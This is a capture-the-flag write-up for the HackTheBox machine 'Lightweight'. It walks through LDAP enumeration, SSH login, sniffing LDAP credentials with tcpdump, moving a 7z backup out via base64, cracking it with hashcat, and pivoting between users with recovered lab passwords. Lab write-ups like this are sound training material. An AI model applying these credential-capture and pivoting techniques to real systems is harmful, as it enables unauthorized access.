# Lightweight

Tags: #Linux #Enumeration #LDAP #Wireshark #Pivoting

Explore is an medium-rated Linux machine from [HackTheBox ](https://app.hackthebox.com/machines/166)created by 0xEA31. In the current post, my IP is 10.10.14.32, and the target IP is 10.129.95.236.

I liked this machine a lot, more than just researching to find a specific CVE or something like that. In the beginning, the machine is open; you can get in without effort and then use various techniques to pivot between many users. It's a good LDAP practice.

## Recon

First, we are going to start with checking if the machine is alive, then do the classic reconnaissance to get some general information about the target.

{% code title="Local Terminal" %}

```bash
$ ping -c 1 10.129.95.236

Pinging 10.129.95.236 with 32 bytes of data:
Reply from 10.129.95.236: bytes=32 time=144ms TTL=63
Reply from 10.129.95.236: bytes=32 time=148ms TTL=63
Reply from 10.129.95.236: bytes=32 time=142ms TTL=63
Reply from 10.129.95.236: bytes=32 time=142ms TTL=63

Ping statistics for 10.129.95.236:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 142ms, Maximum = 148ms, Average = 144ms
```

{% endcode %}

By the TTL, we assume that is a Linux Machine (value around 64)

* -p- --open        to scan all open port
* -T5                    Scan at max speed, a little bit noisy
* -v                     verbose, return more information while scanning
* -n                     Scan don’t apply DNS resolution, more speed.     

{% code title="Local Terminal" %}

```bash
$ nmap -p- --open -T5 -v -n 10.129.95.236 -oG Ports

Completed SYN Stealth Scan at 09:30, 258.48s elapsed (65535 total ports)
Nmap scan report for 10.129.95.236
Host is up (0.15s latency).
Not shown: 65273 filtered tcp ports (no-response), 259 filtered tcp ports (host-prohibited)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
389/tcp open  ldap

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 259.02 seconds
           Raw packets sent: 131004 (5.764MB) | Rcvd: 301 (20.480KB)
```

{% endcode %}

* -sC                    Basic Nmap scripts.
* -sV                    Return versions of the services.

{% code title="Local Terminal" %}

```bash
$ nmap -sCV -p 22,80,389 10.129.95.236 -oN Target

Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-26 09:32 Pacific SA Standard Time
Nmap scan report for 10.129.95.236
Host is up (0.15s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.63 seconds
```

{% endcode %}

Important information: {Domain : lightweight.htb}, modify your host file to add that domain to the target IP.

{% code title="Local Terminal" %}

```bash
$ whatweb http://10.129.95.236
http://10.129.95.236 [200 OK] Apache[2.4.6][mod_fcgid/2.3.9], Country[RESERVED][ZZ], 
HTML5, HTTPServer[CentOS][Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16], 
IP[10.129.95.236], OpenSSL[1.0.2k-fips], PHP[5.4.16], Script, Title[Lightweight slider evaluation page - slendr], 
X-Powered-By[PHP/5.4.16]
```

{% endcode %}

* Browser: <http://10.129.95.236>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FXnGCSZrUJcLOV1U7cs4p%2Fimage.png?alt=media&#x26;token=6ac56cbc-c9e7-43ed-b41d-76c73b55ae2d" alt=""><figcaption><p>Website index</p></figcaption></figure>

So, we will be blocked if we try brute force, this apply to dictionary attacks too. At this point, we have to explore the website through view:source (CTRL+U).

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F1RlQcZFBH2IWHjRIwDiX%2Fimage.png?alt=media&#x26;token=0195a548-8e3e-41db-ade1-2959a6657932" alt=""><figcaption></figcaption></figure>

At the source code, there is a js/index.js, is always a good idea to check with the browser, in case of Directory Listing.

* Browser:         <http://10.129.95.236/js/index.js>

![](https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F5TepZbjsyPloY8VVJpnz%2Fimage.png?alt=media\&token=e2738b4b-e058-4d2a-98f3-ba02fa2a0fa3)

Nothing relevant.

* Browser:         <http://10.129.95.236/js>

It has the capability of Directory Listing, but there is nothing else… Ok, let's explore the website

* Browser:         <http://10.129.95.236/info.php>
  * By clicking on INFO

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F675qMxe5U4hAxwNTdT9b%2Fimage.png?alt=media&#x26;token=16c2d26d-e909-4efc-9cd1-06b6b47a15c4" alt=""><figcaption></figcaption></figure>

* Browser:         <http://10.129.95.236/status.php>
  * By clicking on Status

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FixYRxQy4upH0SDJYLDEh%2Fimage.png?alt=media&#x26;token=bba7d29e-da7d-408f-ad8d-81a9bb47a2cd" alt=""><figcaption><p>Nothing relevant, just a warning.</p></figcaption></figure>

* Browser:       <http://10.129.95.236/user.php>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F4anOESHJRxcRt34OrnYq%2Fimage.png?alt=media&#x26;token=3a61857a-adc4-4ec3-bc7e-b30f42863495" alt=""><figcaption></figcaption></figure>

That is an interesting statement, **we can login using SSH with our IP address as username and password.**

By hovering, we can find that there is a new url, <http://10.129.95.236/reset.php>, it says that is just for reset our username and password, so nothing to worry about.

But first, LDAP Enumeration

### LDAP Enumeration

If we use at the terminal `locate .nse` we will enumerate every nmap script, but here the goal it's to execute every LDAP related script, we can add a filter by using `locate .nse | grep ldap` &#x20;

{% code title="Local Terminal" %}

```bash
nmap --script ldap-brute.nse,ldap-novell-getpass.nse,ldap-rootdse.nse,ldap-search.nse -p389 10.129.95.236 -oN LdapScan
```

{% endcode %}

```
Bug in ldap-brute: no string output.
PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search:
|   Context: dc=lightweight,dc=htb
|     dn: dc=lightweight,dc=htb
|         objectClass: top
|         objectClass: dcObject
|         objectClass: organization
|         o: lightweight htb
|         dc: lightweight
|     dn: cn=Manager,dc=lightweight,dc=htb
|         objectClass: organizationalRole
|         cn: Manager
|         description: Directory Manager
|     dn: ou=People,dc=lightweight,dc=htb
|         objectClass: organizationalUnit
|         ou: People
|     dn: ou=Group,dc=lightweight,dc=htb
|         objectClass: organizationalUnit
|         ou: Group
|     dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser1
|         cn: ldapuser1
|         sn: ldapuser1
|         mail: ldapuser1@lightweight.htb
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: inetOrgPerson
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: shadowAccount
|         userPassword: {crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
|         shadowLastChange: 17691
|         shadowMin: 0
|         shadowMax: 99999
|         shadowWarning: 7
|         loginShell: /bin/bash
|         uidNumber: 1000
|         gidNumber: 1000
|         homeDirectory: /home/ldapuser1
|     dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser2
|         cn: ldapuser2
|         sn: ldapuser2
|         mail: ldapuser2@lightweight.htb
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: inetOrgPerson
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: shadowAccount
|         userPassword: {crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1
|         shadowLastChange: 17691
|         shadowMin: 0
|         shadowMax: 99999
|         shadowWarning: 7
|         loginShell: /bin/bash
|         uidNumber: 1001
|         gidNumber: 1001
|         homeDirectory: /home/ldapuser2
|     dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: ldapuser1
|         userPassword: {crypt}x
|         gidNumber: 1000
|     dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: ldapuser2
|         userPassword: {crypt}x
|_        gidNumber: 1001
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|       namingContexts: dc=lightweight,dc=htb
|       supportedControl: 2.16.840.1.113730.3.4.18
|       supportedControl: 2.16.840.1.113730.3.4.2
|       supportedControl: 1.3.6.1.4.1.4203.1.10.1
|       supportedControl: 1.3.6.1.1.22
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.826.0.1.3344810.2.3
|       supportedControl: 1.3.6.1.1.13.2
|       supportedControl: 1.3.6.1.1.13.1
|       supportedControl: 1.3.6.1.1.12
|       supportedExtension: 1.3.6.1.4.1.1466.20037
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.1
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.3
|       supportedExtension: 1.3.6.1.1.8
|       supportedLDAPVersion: 3
|_      subschemaSubentry: cn=Subschema
```

There is a lot of information, but the password are not decryptable.

## User Pivot

### SSH by using IP

Before the website told us that it is possible to login by using your IP as username and password.

{% code title="Local Terminal" %}

```bash
ssh 10.10.14.32@10.129.95.236

[10.10.14.32@lightweight ~]$ whoami
10.10.14.32
```

{% endcode %}

And… we are in, and we even have a new directory…&#x20;

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ cd ..

$ ls -l
total 0
drwx------. 4 10.10.14.2  10.10.14.2   91 Nov 16  2018 10.10.14.2
drwx------. 4 10.10.14.32 10.10.14.32  91 May 26 15:04 10.10.14.32
drwx------. 2 127.0.0.1   127.0.0.1    62 Sep 27  2021 127.0.0.1
drwx------. 4 ldapuser1   ldapuser1   181 Sep 27  2021 ldapuser1
drwx------. 4 ldapuser2   ldapuser2   197 Sep 27  2021 ldapuser2
```

{% endcode %}

There are more users? And by seeing the permission (drwx------), we are not able to do anything here… We need to go further.

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ grep "sh$" /etc/passwd
root:x:0:0:root:/root:/bin/bash
ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash
10.10.14.2:x:1002:1002::/home/10.10.14.2:/bin/bash
127.0.0.1:x:1003:1003::/home/127.0.0.1:/bin/bash
10.10.14.32:x:1004:1004::/home/10.10.14.32:/bin/bash
```

{% endcode %}

Yes, those are users, perfect targets for User Pivoting.

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ uname -a
Linux lightweight.htb 3.10.0-862.3.3.el7.x86_64 #1 SMP Fri Jun 15 04:15:27 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

$ cat /etc/os-release
NAME="CentOS Linux" # Nothing suspicious here.
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"

```

{% endcode %}

It is necessary to get more information about the target.

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ cd /

$ find \-perm -4000 2>/dev/null | xargs ls -l
-rwsr-xr-x. 1 root root     52952 Apr 11  2018 ./usr/bin/at
-rwsr-xr-x. 1 root root     64240 Nov  5  2016 ./usr/bin/chage
-rws--x--x. 1 root root     24048 Apr 11  2018 ./usr/bin/chfn
-rws--x--x. 1 root root     23960 Apr 11  2018 ./usr/bin/chsh
-rwsr-xr-x. 1 root root     57576 Apr 11  2018 ./usr/bin/crontab
-rwsr-xr-x. 1 root root     32008 Apr 11  2018 ./usr/bin/fusermount
-rwsr-xr-x. 1 root root     78216 Nov  5  2016 ./usr/bin/gpasswd
-rwsr-xr-x. 1 root root     44320 Apr 11  2018 ./usr/bin/mount
-rwsr-xr-x. 1 root root     41776 Nov  5  2016 ./usr/bin/newgrp
-rwsr-xr-x. 1 root root     27832 Jun 10  2014 ./usr/bin/passwd
-rwsr-xr-x. 1 root root     27680 Apr 11  2018 ./usr/bin/pkexec
---s--x---. 1 root stapusr 203832 Apr 12  2018 ./usr/bin/staprun
-rwsr-xr-x. 1 root root     32184 Apr 11  2018 ./usr/bin/su
---s--x--x. 1 root root    143184 Apr 11  2018 ./usr/bin/sudo
-rwsr-xr-x. 1 root root     32048 Apr 11  2018 ./usr/bin/umount
-rwsr-xr-x. 1 root root     15432 Apr 11  2018 ./usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-sr-x. 1 abrt abrt     15432 Apr 27  2018 ./usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwsr-x---. 1 root dbus     58016 Apr 11  2018 ./usr/libexec/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x. 1 root root     11216 Apr 11  2018 ./usr/sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root     36280 Apr 11  2018 ./usr/sbin/unix_chkpwd
-rws--x--x. 1 root root     40312 Jun  9  2014 ./usr/sbin/userhelper
-rwsr-xr-x. 1 root root     11288 Apr 11  2018 ./usr/sbin/usernetctl
```

{% endcode %}

List of SUID privileges, there is nothing critical. And we are not able to modify one of these files or execute them as temporal root

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep #Interesting...
```

{% endcode %}

### Network Capture

by checking capabilities, we found TCPdump, and that is interesting to play with specially because we can execute an account reset at **reset.php** to trigger an interaction with us.

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ cd /tmp/

$ tcpdump -i any -w Capture.cap -v # Just a test, you can try "which tcpdump" too

$ rm Capture.cap
```

{% endcode %}

* -i any     Any Interface
* -w          Save the output as:
* -v           Verbose

It was just a test, now the best option is to open a new local terminal or Wireshark to scan a TCPDump sent by the target.

<pre class="language-bash" data-title="Target Terminal [10.10.14.32]"><code class="lang-bash"><strong>$ tcpdump -i lo port 389 -w capture.cap -v
</strong></code></pre>

Now play at the website, navigate everywhere, press all the buttons, and the most important thing, execute the reset.php command.

You have to download the capture.cap file and explore the content with Wireshark

{% code title="Local Terminal" %}

```bash
$ scp 10.10.14.32@10.129.95.236:/tmp/capture.cap capture.cap
      # Password: 10.10.14.32
$ wireshark capture.cap
```

{% endcode %}

Open the capture.cap file with Wireshark and search for Protocol LDAP. Then right click over the packet > Follow > TCP Sequence

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FxnUNWGOEvyZCGDP69Gqk%2Fimage.png?alt=media&#x26;token=ed257060-4f1e-4dfb-9bf2-149b282fcef2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FV2SIxJ3ei3uXmfLhiyoS%2Fimage.png?alt=media&#x26;token=907b659a-ccb1-4ba4-80e5-cb8ff90d6641" alt=""><figcaption></figcaption></figure>

We have new information, {username: ldapuser2 @ password : 8bc8251332abe1d7f105d3e53ad39ac2}, now return to the Target Terminal.

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ su - ldapuser2
Password: # 8bc8251332abe1d7f105d3e53ad39ac2

[ldapuser2@lightweight ~]$ cat user.txt
2f3954743b5446b603d25d0a8956c741
```

{% endcode %}

## Privileges Escalation

### User Pivot II

<pre class="language-bash" data-title="Target Terminal [ldapuser2]"><code class="lang-bash"><strong>$ ls -l
</strong>
total 1868
-rw-r--r--. 1 root      root         3411 Jun 14  2018 backup.7z
-rw-rw-r--. 1 ldapuser2 ldapuser2 1520530 Jun 13  2018 OpenLDAP-Admin-Guide.pdf
-rw-rw-r--. 1 ldapuser2 ldapuser2  379983 Jun 13  2018 OpenLdap.pdf
-rw-r--r--. 1 root      root           33 May 26 14:10 user.txt
</code></pre>

Look what we found, a backup file… take it by using the TargetSSH terminal and a LocalTerminal... Copy all the content

{% code title="Target Terminal \[ldapuser2]" %}

```bash
base64 -w 0 backup.7z ; echo
```

{% endcode %}

```
N3q8ryccAAQmbxM1EA0AAAAAAAAjAAAAAAAAAI5s6D0e1KZKLpqLx2xZ2BYNO8O7/Zlc4Cz0MOpBlJ/010X2vz7SOOnwbpjaNEbdpT3wq/EZAoUuSypOMuCw8Sszr0DTUbIUDWJm2xo9ZuHIL6nVFlVuyJO6aEHwUmGK0hBZO5l1MHuY236FPj6/vvaFYDlkemrTOmP1smj8ADw566BEhL7/cyZP+Mj9uOO8yU7g30/qy7o4hTZmP4/rixRUiQdS+6Sn+6SEz9bR0FCqYjNHiixCVWbWBjDZhdFdrgnHSF+S6icdIIesg3tvkQFGXPSmKw7iJSRYcWVbGqFlJqKl1hq5QtFBiQD+ydpXcdo0y4v1bsfwWnXPJqAgKnBluLAgdp0kTZXjFm/bn0VXMk4JAwfpG8etx/VvUhX/0UY8dAPFcly/AGtGiCQ51imhTUoeJfr7ICoc+6yDfqvwAvfr/IfyDGf/hHw5OlTlckwphAAW+na+Dfu3Onn7LsPw6ceyRlJaytUNdsP+MddQBOW8PpPOeaqy3byRx86WZlA+OrjcryadRVS67lJ2xRbSP6v0FhD/T2Zq1c+dxtw77X4cCidn8BjKPNFaNaH7785Hm2SaXbACY7VcRw/LBJMn5664STWadKJETeejwCWzqdv9WX4M32QsNAmCtlDWnyxIsea4I7Rgc088bzweORe2eAsO/aYM5bfQPVX/H6ChYbmqh2t0mMgQTyjKbGxinWykfBjlS7I3tivYE9HNR/3Nh7lZfd8UrsQ5GF+LiS3ttLyulJ26t01yzUXdoxHg848hmhiHvt5exml6irn1zsaH4Y/W7yIjAVo9cXgw8K/wZk5m7VHRhelltVznAhNetX9e/KJRI4+OZvgow9KNlh3QnyROc1QZJzcA5c6XtPqe49W0X4uBydWvFDbnD3Xcllc1SAe8rc3PHk+UMrKdVcIbWd5ZyTPQ2WsPO4n4ccFGkfqmPbO93lynjyxHCDnUlpDYL1yDNNmoV69EmxzUwUCxCH9B0J+0a69fDnIocW+ZJjXpmGFiHQ6Z2dZJrYY9ma2rS6Bg7xmxij3CxkgVQBhnyFLqF7AaXFUSSc7yojSh0Kkb4EfgZnijXr5yVsypeRWQu/w37iANFz8ch6WFADkg/1L8OPdNqDwYKE2/Fx7aRfsMuo0+0J/J2elR/5WuizMm7E0s9uqsookEZKQk95cY8ES2t5A8D1EnRDMvYV+B56ll34H3iulQuY35EGYLTIW77ltrm06wYYaFMNHe4pIpasGODzCBBIg0EpWDsqf6iFcwOewBZXZCRQaIRkounbm/lIPRBYdaMNhV/mxleoHOUkKiqZiHvcHHhrV5FrA6DTzd3sGgqPlObZkm6/U0pbKPxKThaVaUGl64cY28oh2UZKSpcLd6WWdIPxNzxNwElnsWFk2dnvaCSs/LY+IJEyNHErervIL1Yq6mXvOdK+9mCNiHzV/2eWaWelaKPcIfKK05PSqzyoX/e4fuvZf4DYeOYWEhu5QCDG+4DzeAxB26O0xMP87rqXSPTZpH00VLSRuVuv3e/QSvyLGSLkqHU0U505H7lItZ/MH1BywK88Ka+77Cbi39f8bU46Gf2zfNSTQrx+x1JrZZQpWzQf5qGipfOZ6trebcuE2H/TsAqbee9sEcwB9ZWKQ/vdJgLrELTdqjJ6wEPuAcRw0+0lGUiOgBgwQ/QZaPMig1d8tWFd4kFvy5p0sc4oJhT4GLxa3vDLHdbrmNdKjYIU7Co2GyRrrWVrSH6NzkD0/vgIrYGMBu9aly4mFOUeawQPSRqS/znVVAjPkszA95fyfYwffFAEtWE6ZgtvMGukR7uZu+WkCNAOst1BJzUQl/IE6dJ3peuXMwo9NAnH4JehhjlUKxye/jXtobEsE0a8iBagQw9WaKOHNVZ7oJWAUE3oMbtjmrHefSr88uRwy97Slg8zAKyohEbM8PoncVZm5OtF/l1qekbEFNYeX7v9OExT6LrGgFCDFkMywr150FxNEENjd6NbhALhhu/YlZExQ3hAx7AQ1850Qj4IvqgGOUFNvQwpDO1bsa31l7enYUHMFdPTBUvMTp3yNL5Bh3JVdmRehuDPubd2moze++xbCNT+2gTo/UN2MeGBrIne7JxUEFoyd2osuPBoF3qrw3U1nls4rk64zr8GaPXRBKXFkpyJDH0d4GlAY5Q7hEzY8nS29ry+AEs/5U5SkFIA5bAkoCSYofdndY6RBRbHwpWlUoAuR9aZzdmK3qB71PU/dFNCuZAGczm5oKKrDG6iwCEJYblsfCKy2qoyLef93JFSfRGMRdSioIosN6hae2ZatLpiW5gwGQhbMglseO2KdgyD+/bFgRt7FmgbCmFRNobWgQxy0PHDC3krGUikeK1mCkA2/NXb/FezUqIqTtJ9rx+EVaqdgaW4soKH/qQ0LBS9Qs8xWcgw0yLRZpWKbiM8p7ndKRT84fJiH5WZjoPfab7iL3CuCG8kJpBjH80zcwuy5a1k+n0Le5OTGVcxHuqptFOC0CDoWFbkVnEtpRqcIgIm0qF351jqa3YxZHzIQZ0E+2tdq0CoQbqdVmClUKyBevZ588GiZrnGVzcpiKs4z7aXFpXFm1RU/ffKEXAGa5nAbJhfuFZO7Uyq3gQO+TINUZgEGiv8YrSyHrCAUgYo7TyMii/9jgBzskwgWYFdqG8baCYi5xQSSVD/Jq15vzGJczH8I80HX7H0giBGJzsImL68G6IxENdO1FnAwPEkiPC1ExD1nJ2uU3zdpaddSKSsVEUx+6kv1tuqAYyzzGnuS5hZ8/oeAi1IUL/Zla+p1wJzeJCE9ZVaMN88995/RcJgH+HuCtvInbvRqiO63N/MnZXiv9bxAskr0fuWSPRGqYqxYwIEn2hioNocdY0PCndj6awM3alL7Uf5gQP44GjNEryDu5or0r4ZWT1kovEDTNrW++5JhIils37+vP5mc5PPkcGk0ACC6oRj1X5pGg+zsjlAkNqwC7ANJ7QYsNsBcdp0ttMUt42VHsXsh+/4GACg9Bu16wHV0RYYNmfhdixKHRljHAWmHhvg8F5RiNon3xoNhpcRn74paT13bOUMeJajvFKIjr3OwFak1+Z1ry6o3iX1LgRw4FPdZhSzVIrQzSgqdtOXt+L+3JjZdQA70p/uvFPuW0EgiFmawgPLi2vh86BBRRE5GzSV0XWz39p5kHUyVf8PE+uGzpe1xpJaoxhoUjwyVUhyAXnGng6N+EB/XofyY6zQJMxcT1p173pvwaO2UCV/yiCqAGdPNaB9rHJHG7tQAVK1Hf4XQ7eXrWERCqdrn+acCgJQa6Sm/AtKIC77nYjfujjltTUgRgIswXtXvbQBU9trl+LzRNLEWYwNAhBE7rAUI/b2reVwLhC2N4L+3duuuh3Z+XJes/hVhPziMZskhR1+w7osJ3R0FoOzg+yXqtt8kS1lW25bFHwzuxhWYjuMoI8JLAZ31W4d3pmqMaswplTFeChTahILTkg1ymx7WiJDvd+5oAdQUhx0ZUooHLEsgGQ3AwzVd5B6eX3GOjlZ1HtoEZoyoimJm+BreXnBSyyY51ZnuMXTDw3+3ZVTuolK2azaYvf2B7s1wIDDpEAQisDORfGHPFhzSI8pAXkLCMtJKJMqHEedid7V9s6fFsKX6dzDPGuIKybFO3pPKzkDZ+NuOEweuYBcBHGq1Pd0luj0/UR0SN1ZU2YppkXQSVb8MLzGhnGOjU18/J7L7zdFrwON5Vgm0yi3utSi63oQ+vCcBhj9kNGUHo4ydLzW6y2L7UMOv+boaCtgOQ15Fh86NJxz3lUtQPdCHlxLTegP6zmY60zm7K75vSdo6L5lNM0SrBY+cNPtI5Y4AcBHcGEMkfH/z0y98qcz9R5v1ZbIVcC5BYIqODioLqLQ5R3UQsRR0FxqobAJmIPbVDknwMxAFuJ7sbF/6GOuDBhFjtvM3WsV8Lc8PcjGcsG7vYHykOm7UpEZIUOUXVh1f2Ts7r2I5GfUi1SiXO5+11JjpLtdVZe5tbdbbCVPgYcfGCRtLZH2ZKD0nB9nlA15LSJScucTJZ8xNeXChuCBseIzH5IX3hwMkQnXqJhFi+haTBMOpujA203F2/d9pQRffaZHxm5a9WdrsVIh1RUtpVGpOQ/akuNTn956+9BOLnEO8otdXlDy/awQbJoY7wJBT7Rm9Q9StuiOM2/+T6kp2VSGMPPX+31Q6lkLLjvcOojPnX9rMPB9KN3yjBXFNx6wAAgTMHrg/Vsp0lFyTRz+QEKAUvF3aBjjc/V0Q4XUZ3BfKqlXszFWD9VOwoDdFrrQVyt1Xkpeghr98oqeM/tqsHa+cTU4KLtvE6dFAT+mBHorrZNMgAQ1QMjgI1JixeXRRvEIabAUKuuhy+yBzO20vtlnuPmOh3sgjIhYusiF1vL3ojt9qcVa4mCjTpus4e3vJ4gd6iWAt8KT2GmnPjb0+N+tYjcX9U/W/leRKQGX/USF7XWwZioJpI7t/uAAAAABcGjFABCYDAAAcLAQABIwMBAQVdABAAAAyBCgoBPiBwEwAA
```

{% code title="Local Terminal" %}

```bash
echo "<All the content>" | base64 -d > backup.7z
```

{% endcode %}

If you want, compare the hash with md5sum in both terminals to check if the file is the same… now try to unpack.

![](https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FSTkr9FjUvnoiPqAhe8rD%2Fimage.png?alt=media\&token=516251e0-e5d8-42c9-bea3-9bc85f592368)

{% code title="Local Terminal" %}

```bash
$ /usr/src/john/run/7z2john.pl backup.7z > hash
# If this fails, try: "apt-get install -y libcompress-raw-lzma-perl"

$ hashcat --example-hashes | grep -A 2 -B 2 7-Zip

Hash mode #11600
  Name................: 7-Zip
  Category............: Archive
  Slow.Hash...........: Yes
  
$ hashcat -m 11600 hash /usr/share/wordlists/rockyou.txt

$ vi hash
```

{% endcode %}

Delete the marked part from the file "hash"

![](https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FSqblrz9VNDnFtiw6diG5%2Fimage.png?alt=media\&token=90d1cc47-9114-4a51-89ae-e9fbb2d21934)

{% code title="Local Terminal" %}

```bash
$ hashcat -m 11600 hash /usr/share/wordlists/rockyou.txt
```

{% endcode %}

![](https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FjJIoAR2IkpTdcgvj7OYS%2Fimage.png?alt=media\&token=b7fafee2-771d-4b8a-a2e5-6fe58b97b430)

Now that we have the content of the webpage, we can explore the whole.

{% code title="Local Terminal" %}

```bash
$ 7z x backup.7z

$ cat index.php #Nothing
$ cat info.php #Nothing
$ cat reset.php #Nothing
$ cat status.php # :o
```

{% endcode %}

```
<...>
  22   │ <?php
  23   │ $username = 'ldapuser1';
  24   │ $password = 'f3ca9d298a553da117442deeb6fa932d';
  25   │ $ldapconfig['host'] = 'lightweight.htb';
  26   │ $ldapconfig['port'] = '389';
  27   │ $ldapconfig['basedn'] = 'dc=lightweight,dc=htb';
  28   │ //$ldapconfig['usersdn'] = 'cn=users';
  29   │ $ds=ldap_connect($ldapconfig['host'], $ldapconfig['port']);
  30   │ ldap_set_option($ds, LDAP_OPT_PROTOCOL_VERSION, 3);
  31   │ ldap_set_option($ds, LDAP_OPT_REFERRALS, 0);
  32   │ ldap_set_option($ds, LDAP_OPT_NETWORK_TIMEOUT, 10);
  33   │
  34   │ $dn="uid=ldapuser1,ou=People,dc=lightweight,dc=htb";
<...>
```

New information: {username : ldapuser1 @ password : f3ca9d298a553da117442deeb6fa932d }, now return to the Target Terminal

{% code title="Target Terminal \[ldapuser2]" %}

```bash
[ldapuser2@lightweight ~]$ su - ldapuser1
Password:  # f3ca9d298a553da117442deeb6fa932d 

[ldapuser1@lightweight ~]$ whoami
ldapuser1
```

{% endcode %}

### Root

{% code title="Target Terminal \[ldapuser1]" %}

```bash
[ldapuser1@lightweight ~]$ id
